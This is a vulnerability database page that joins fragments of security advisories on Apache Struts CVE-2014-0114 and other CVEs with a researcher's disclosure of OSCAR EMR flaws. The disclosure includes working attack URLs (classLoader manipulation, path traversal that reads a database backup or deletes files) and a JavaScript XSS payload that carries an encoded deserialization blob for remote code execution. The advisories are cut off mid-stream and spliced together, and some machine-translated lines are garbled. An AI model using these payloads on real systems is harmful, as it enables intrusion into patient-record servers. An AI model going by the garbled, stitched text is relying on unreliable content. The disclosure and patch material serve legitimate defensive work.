VARIoT IoT vulnerabilities database

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. TERASOLUNA Server Framework for Java(Web) provided by NTT DATA Corporation is a software framework for creating Java web applications. TERASOLUNA Server Framework for Java(Web) bundles Apache Struts 1.2.9, which contains a vulnerability where the ClassLoader may be manipulated (CVE-2014-0114). Therefore, this vulnerability affects TERASOLUNA Server Framework for Java(Web) as well.On a server where the product in running, a remote attacker may steal information or execute arbitrary code. Description: Red Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint, flexible, open source enterprise service bus and integration platform. (CVE-2014-0114) Refer to the readme.txt file included with the patch files for installation instructions. Solution: The References section of this erratum contains a download link (you must log in to download the update). _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114 http://advisories.mageia.org/MGASA-2014-0219.html _______________________________________________________________________ Updated Packages: Mandriva Enterprise Server 5: 2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm 8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm 3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm 96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm 37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm 8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm Mandriva Business Server 1/X86_64: 1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm 5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm f135f96b6d2121b157b7a62afd449ea6 mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb HUtc9GTxbEwte2/fTU7bJ5M= =5Ewj -----END PGP SIGNATURE----- . Title: Multiple vulnerabilities in OSCAR EMR Product: OSCAR EMR Vendor: Oscar McMaster Tested version: 15.21beta361 Remediation status: Unknown Reported by: Brian D. Hysell ----- Product Description: "OSCAR is open-source Electronic Medical Record (EMR) software that was first developed at McMaster University by Dr. David Chan. It is continuously enriched by contributions from OSCAR users and the Charter OSCAR Service Providers that support them. OSCAR has been certified by OntarioMD, and verified as IHE compliant, achievements made possible by the creation and success of OSCAR EMRas ISO 13485:2003 certified Quality Management System." ----- Timeline: 29 Mar 2016 - Vendor contacted 29 Mar 2016 - Vendor responded 29 Apr 2016 - Vendor contacted for permission to share redacted report with third party 02 May 2016 - Vendor responded 17 Jan 2017 - Lead developer contacted (no response) 01 Jul 2018 - Vendor and lead developer contacted for follow-up, informed of intended 15 Aug disclosure (no response) 12 Aug 2018 - Alternate email address attempted for lead developer (no response) 15 Aug 2018 - Vulnerabilities publicly disclosed ----- Contents: This report uses OVE identifiers: http://www.openwall.com/ove/ OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency OVE-20160329-0003: Remote code execution via unsafe object deserialization OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface OVE-20160329-0007: SQL injection OVE-20160329-0008: Path traversal OVE-20160329-0002: Insecure direct object reference in document manager OVE-20160329-0005: Denial of service via resource exhaustion OVE-20160329-0006: Insecure password storage OVE-20160329-0009: Cross-site request forgery ----- Issue details: === OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency === OSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to CVE-2014-0114. An authenticated user can issue the following request with different / omitted cookie headers: /oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster Consequently, he or she can access (using a valid session cookie), e.g., /oscar/OscarBackup.sql.gz An unauthenticated attacker is prevented from doing likewise by the aLoginFiltera servlet filter, but can still carry out a denial-of-service attack impeding any access to the application until Tomcat is restarted by issuing a request like the following: /oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid === OVE-20160329-0003: Remote code execution via unsafe object deserialization === TraceabilityReportProcessor deserializes user-provided data, allowing remote code execution given the presence of known-vulnerable libraries in the classpath such as ROME 1.0. This functionality is only available to administrators but can be exploited via XSS (OVE-20160329-0004) or CSRF (issue 9) using a payload generated with ysoserial. In the tested configuration PMmodule/GenericIntake/ImportForm.jsp is inaccessible due to the following exception aorg.springframework.beans.factory.NoSuchBeanDefinitionException: No bean named 'oscarSecurityManager' is defineda, but were it to be accessible, it would be vulnerable as well. === OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface === logReport.jsp, in general, does not escape data it outputs to the page; in particular, on line 283, prop.getProperty("contentId") is printed unescaped. As a result, if an attacker includes Javascript in his or her username during a login attempt, it will be executed if an administrator views the Security Log Report for that timeframe. The text printed in the "Keyword" column is cut off at 80 characters, but that is more than enough to load an externally-hosted script, such as the following script exploiting the deserialization RCE OVE-20160329-0003: var decodedBase64 = atob("H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA=="); var binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length)); for(var i = 0; i < binaryArray.length; i++) { binaryArray[i] = decodedBase64.charCodeAt(i); } var payload = new Blob([binaryArray], {type: "application/x-gzip"}); var formData = new FormData(); formData.append("file", payload); formData.append("submit", "Generate"); var xhr = new XMLHttpRequest(); xhr.open("POST", "/oscar/admin/GenerateTraceabilityReportAction.do"); xhr.send(formData); XSS was not a focus of this test; other confirmed or likely XSS vulnerabilities are: * Reflected XSS through the errormsg parameter in loginfailed.jsp * Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp * Reflected XSS through the noteId parameter, line 1562 in CaseManagementViewAction (untested) * Reflected XSS through the pdfName parameter when an exception has been thrown, line 1174 in ManageDocumentAction (untested) * Reflected XSS through the pharmaName and pharmaFax parameters, line 149 in FrmCustomedPDFServlet (untested) * Reflected XSS through the id and followupValue parameters, line 81 in EctAddShortMeasurementAction (untested) === OVE-20160329-0007: SQL injection === On line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is concatenated into an SQL statement rather than parameterized; likewise the content parameter on lines 217, 223, and 229 of admin/logReport.jsp. In both cases these errors result in error-based SQL injection vulnerabilities; the former allows authenticated users with access to oscarMDS/PatientSearch.jsp to access information beyond their privilege levels while the latter is accessible only to administrators. === OVE-20160329-0008: Path traversal === ImportLogDownloadAction reads and outputs an arbitrary absolute file path provided by the user; DelImageAction deletes a user-specified filename without accounting for the possibility of relative path traversal (i.e., the inclusion of "../" in the filename). Any authenticated user can exploit the former issue to steal files from the system, e.g., /oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz An authenticated user with access to eforms can delete files writeable by the Tomcat user, e.g., /oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp === OVE-20160329-0002: Insecure direct object reference in document manager === ManageDocumentAction.display() does not check the permissions associated with the requested document ID (doc_no) before providing it to the requesting user. Given /oscar/dms/ManageDocument.do?method=display&doc_no=X&providerNo=Y, a user with access to the document management interface can view arbitrary documents by incrementing or decrementing X, regardless of whether they have been marked private. === OVE-20160329-0005: Denial of service via resource exhaustion === uploadSignature.jsp, which is accessible to and operable by unauthenticated users, saves uploaded files to a temporary directory but never deletes them. An attacker can upload many junk files and eventually consume all disk space available to the /tmp directory, impeding access to the application depending on the functionality in question and the partition layout of the host system (the effects are crippling and pervasive if /tmp is on the same partition as /; they are much less so if /tmp is on a separate partition). === OVE-20160329-0006: Insecure password storage === Passwords are stored as SHA-1 hashes; unless unusually complex, passwords stored in that manner are typically easily recoverable with a tool such as oclHashcat. In OSCAR each hash is stored as a string of decimal numbers, rather than hexadecimal or raw bytes. This somewhat non-traditional representation adds a bit of programming work to the cracking process, but does not represent a major impediment to attack. === OVE-20160329-0009: Cross-site request forgery === The application lacks protection against cross-site request forgery attacks. A CSRF attack could be used against an administrator to exploit the deserialization RCE in a manner similar to the example provided with OVE-20160329-0004. Workaround ========== There is no known workaround at this time. Resolution ========== All Commons BeanUtils users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=dev-java/commons-beanutils-1.9.2" References ========== [ 1 ] CVE-2014-0114 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201607-09 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: struts security update Advisory ID: RHSA-2014:0500-01 Product: Red Hat Satellite Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0500.html Issue date: 2014-05-14 CVE Names: CVE-2014-0114 ===================================================================== 1. Summary: Updated struts packages that fix one security issue are now available for Red Hat Network Satellite 5.4 and 5.5, and Red Hat Satellite 5.6. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. 2. Relevant releases/architectures: Red Hat Satellite 5.4 (RHEL v.6) - noarch Red Hat Satellite 5.5 (RHEL v.6) - noarch Red Hat Satellite 5.6 (RHEL v.6) - noarch 3. Description: Red Hat Satellite is a systems management tool for Linux-based infrastructures. It allows for provisioning, monitoring, and remote management of multiple Linux deployments with a single, centralized tool. This could lead to remote code execution under certain conditions. (CVE-2014-0114) All Satellite users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For this update to take effect, the tomcat6 service must be restarted ("service tomcat6 restart"). 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters 6. Package List: Red Hat Satellite 5.4 (RHEL v.6): Source: struts-1.3.10-6.ep5.el6.src.rpm noarch: struts-1.3.10-6.ep5.el6.noarch.rpm struts-core-1.3.10-6.ep5.el6.noarch.rpm struts-extras-1.3.10-6.ep5.el6.noarch.rpm struts-taglib-1.3.10-6.ep5.el6.noarch.rpm struts-tiles-1.3.10-6.ep5.el6.noarch.rpm Red Hat Satellite 5.5 (RHEL v.6): Source: struts-1.3.10-6.ep5.el6.src.rpm noarch: struts-1.3.10-6.ep5.el6.noarch.rpm struts-core-1.3.10-6.ep5.el6.noarch.rpm struts-extras-1.3.10-6.ep5.el6.noarch.rpm struts-taglib-1.3.10-6.ep5.el6.noarch.rpm struts-tiles-1.3.10-6.ep5.el6.noarch.rpm Red Hat Satellite 5.6 (RHEL v.6): Source: struts-1.3.10-6.ep5.el6.src.rpm noarch: struts-1.3.10-6.ep5.el6.noarch.rpm struts-core-1.3.10-6.ep5.el6.noarch.rpm struts-extras-1.3.10-6.ep5.el6.noarch.rpm struts-taglib-1.3.10-6.ep5.el6.noarch.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0114.html https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFTc7+TXlSAg2UNWIIRAmptAJ9n47yYBOA5OA5jE3gLpsRx20tKagCfWNc8 M3/iYEVhVrBlugdrBQzYI+U= =k5DC -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c05324755 Version: 1 HPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote Denial of Service, Arbitrary Code Execution and Cross-Site Request Forgery NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2016-11-04 Last Updated: 2016-11-04 Potential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary Code Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS) Source: Hewlett Packard Enterprise, Product Security Response Team VULNERABILITY SUMMARY Potential vulnerabilities have been identified in HPE SiteScope. The vulnerabilities could be exploited to allow local elevation of privilege and exploited remotely to allow denial of service, arbitrary code execution, cross-site request forgery. References: - CVE-2014-0114 - Apache Struts, execution of arbitrary code - CVE-2016-0763 - Apache Tomcat, denial of service (DoS) - CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions - CVE-2015-3253 - Apache Groovy, execution of arbitrary code - CVE-2015-5652 - Python, elevation of privilege - CVE-2013-6429 - Spring Framework, cross-site request forgery - CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS) - PSRT110264 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. - HP SiteScope Monitors Software Series 11.2xa11.32IP1 BACKGROUND CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector CVE-2013-6429 6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) CVE-2014-0050 8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) CVE-2014-0107 8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) CVE-2014-0114 6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) CVE-2015-3253 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) CVE-2015-5652 8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C) CVE-2016-0763 6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) Information on CVSS is documented in HPE Customer Notice HPSN-2008-002 here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499 RESOLUTION HPE has provided a resolution via an update to HPE SiteScope. Details on the update and each vulnerability are in the KM articles below. **Note:** The resolution for each vulnerability listed is to upgrade to SiteScope 11.32IP2 or an even more recent version of SiteScope if available. The SiteScope update can be can found in the personal zone in "my updates" in HPE Software Support Online: <https://softwaresupport.hpe.com>. * Apache Commons FileUpload: KM02550251 (CVE-2014-0050): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02550251> * Apache Struts: KM02553983 (CVE-2014-0114): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553983> * Apache Tomcat: KM02553990 (CVE-2016-0763): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553990> * Apache XML Xalan: KM02553991 (CVE-2014-0107): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553991> * Apache Groovy: KM02553992 (CVE-2015-3253): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553992> * Python: KM02553997 (CVE-2015-5652): * <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553997> * Spring Framework: KM02553998 (CVE-2013-6429): + <https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets arch/document/KM02553998> HISTORY Version:1 (rev.1) - 4 November 2016 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com. Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX Copyright 2016 Hewlett Packard Enterprise Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. References: CVE-2014-0114, SSRT101566 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Mitigation information for the Apache Struts vulnerability (CVE-2014-0114) is available at the following location: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-a pplications/ba-p/6463188#.U2J7xeaSxro Japanese information is available at the following location: http://www.hp.com/jp/icewall_patchaccess Note: The HP IceWall product is only available in Japan. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. Thanks to the efforts of Alvaro Munoz and the HP Fortify team, the Apache Struts project team can recommend a first mitigation that is relatively simple to apply. It involves the introduction of a generic Servlet filter, adding the possibility to blacklist unacceptable request parameters based on regular expressions. Please see the corresponding HP Fortify blog entry [2] for detailed instructions. Based on this information, the Apache Struts project team recommends to apply the mitigation advice *immediately* for all Struts 1 based applications. Struts 1 has had its End-Of-Life announcement more than one year ago [3]. However, in a cross project effort the Struts team is looking for a correction or an improved mitigation path. Please stay tuned for further information regarding a solution. This is a cross-list posting. If you have questions regarding this report, please direct them to security@struts.apache.org only. [1] http://struts.apache.org/release/2.3.x/docs/s2-021.html [2] http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro [3] http://struts.apache.org/struts1eol-announcement.html -- Ren\xe9 Gielen http://twitter.com/rgielen

Heap-based buffer overflow in the Web Server in Cogent Real-Time Systems Cogent DataHub before 7.3.5 allows remote attackers to execute arbitrary code via a negative value in the Content-Length field in a request. Authentication is not required to exploit this vulnerability. The specific flaw exists within the included Web Server. By providing a request with a crafted Content-Length field, an attacker is able to overflow a heap buffer. An attacker could leverage this to execute arbitrary code in the context of the DataHub process. Cogent DataHub is software for SCADA and automation. Failed exploit attempts will likely result in denial-of-service conditions. Versions prior to Cogent DataHub 7.3.5 are vulnerable

Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco WebEx Meetings Server allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCuj81777. Vendors have confirmed this vulnerability Bug ID CSCuj81777 It is released as.A third party may be able to hijack the authentication of any user. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. This issue is being tracked by Cisco Bug IDs CSCuj81777, CSCuj81786 and CSCuj81864. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution

The ABAP Help documentation and translation tools (BC-DOC-HLP) in Basis in SAP Netweaver ABAP Application Server does not properly restrict access, which allows local users to gain privileges and execute ABAP instructions via crafted help messages. SAP BASIS is prone to a security bypass vulnerability. Successfully exploiting this issue may allow an attacker to bypass certain security restrictions and to gain unauthorized actions

Cisco Adaptive Security Appliance (ASA) Software, when DHCPv6 replay is configured, allows remote attackers to cause a denial of service (device reload) via a crafted DHCPv6 packet, aka Bug ID CSCun45520. An attacker can exploit this issue to cause the affected device to reload, denying service to legitimate users. This issue is tracked by Cisco Bug ID CSCun45520

The L2TP module in Cisco IOS XE 3.10S(.2) and earlier on ASR 1000 routers allows remote authenticated users to cause a denial of service (ESP card reload) via a malformed L2TP packet, aka Bug ID CSCun09973. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. The vulnerability is due to the failure to properly process L2TP packets. The attacker can use the vulnerability to send malformed L2TP packets to crash the service and cause a denial of service attack. Successful exploits may allow attackers to cause a reload of the affected ESP card, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCun09973

The IP Manager Assistant (IPMA) component in Cisco Unified Communications Manager (Unified CM) allows remote attackers to obtain sensitive information via a crafted URL, aka Bug ID CSCun74352. Vendors have confirmed this vulnerability Bug ID CSCun74352 It is released as.Skillfully crafted by a third party URL You may get important information through. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. This issue is being tracked by Cisco BugId CSCun74352. IP Manager Assistant (IPMA) is one of the PC-based network management applications, also known as network assistant, which is mainly used to simplify network configuration, deployment, and daily management and maintenance

The Call Detail Records (CDR) Management component in Cisco Unified Communications Manager (Unified CM) allows remote authenticated users to obtain sensitive information by reading extraneous fields in an HTML document, aka Bug ID CSCun74374. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. This issue is being tracked by Cisco BugId CSCun74374. Call Detail Records (CDR) Management is one of the call detail record management applications

The Document Management component in Cisco Unified Contact Center Express does not properly validate a parameter, which allows remote authenticated users to upload files to arbitrary pathnames via a crafted HTTP request, aka Bug ID CSCun74133. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. This issue is being tracked by Cisco Bug ID CSCun74133. Document Management is one of the document management applications. A remote attacker could exploit this vulnerability by sending a specially crafted HTTP request to upload any to any pathname

CookieInterceptor in Apache Struts before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094. This vulnerability CVE-2014-0094 Vulnerability due to insufficient fix for.Through a crafted request by a third party, ClassLoader The " operation (manipulate)" And any code could be executed. Apache Struts is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. Apache Struts versions 2.0.0 through 2.3.16.1 are vulnerable

Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014. Adobe Flash Player Contains a buffer overflow vulnerability. Attacks on this vulnerability 2014 Year 4 Observed on the moon.A third party may execute arbitrary code. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201405-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Adobe Flash Player: Multiple vulnerabilities Date: May 03, 2014 Bugs: #501960, #504286, #507176, #508986 ID: 201405-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Adobe Flash Player, the worst of which could result in execution of arbitrary code. Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Furthermore, a remote attacker may be able to bypass the Same Origin Policy or read the clipboard via unspecified vectors. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.356" References ========== [ 1 ] CVE-2014-0498 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0498 [ 2 ] CVE-2014-0499 